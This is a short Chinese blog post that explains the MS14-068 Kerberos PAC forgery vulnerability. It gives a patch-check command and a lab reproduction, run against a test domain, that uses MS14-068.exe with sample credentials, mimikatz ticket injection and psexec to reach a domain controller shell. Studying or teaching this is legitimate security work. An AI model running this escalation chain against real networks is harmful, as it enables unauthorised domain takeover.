MS14-068

MS14-068

原理

1.向KDC下的AS发送一个不带PAC的AS_REQ

2.AS返回你一个不带PAC的TGT

3.制作一个管理员组权限的PAC,和TGT一起装在TGS_REQ中发给KDC下的TGS

4.TGS误识别了你伪造的信息,并发给你发给你一个管理员权限的包含PAC的ST

5.server拿到了ST,拆开ST,把其中的PAC发给TGS,TGS验证了权限之后,server向你提供管理员级别的服务

当我们拿到了一个普通域成员的账号后,想继续对该域进行渗透,拿到域控服务器权限。如果域控服务器存在 MS14_068 漏洞,并且未打补丁,那么我们就可以利用 MS14_068 快速获得域控服务器权限。

MS14-068编号 CVE-2014-6324,补丁为 3011780 ,如果自检可在域控制器上使用命令检测。

systeminfo |find "3011780"
#为空说明该服务器存在MS14-068漏洞

复现

#生成凭证TGT_win7admin@hacker.lab.ccache
#MS14-068.exe -u 域用户@hacker.lab -p 域用户密码 -s 域用户SID只 -d 域控ip
MS14-068.exe -u win7admin@hacker.lab -p 1qaz@WSX -s S-1-5-21-1582912704-266771287-3858088903-1106 -d 10.211.55.30 

#mimikatz导入凭证
kerberos::ptc TGT_win7admin@hacker.lab.ccache


可以直接连

psexec64.exe \\r-dc cmd.exe
posted @ 2022-08-12 21:09  九天揽月丶  阅读(225)  评论(0编辑  收藏  举报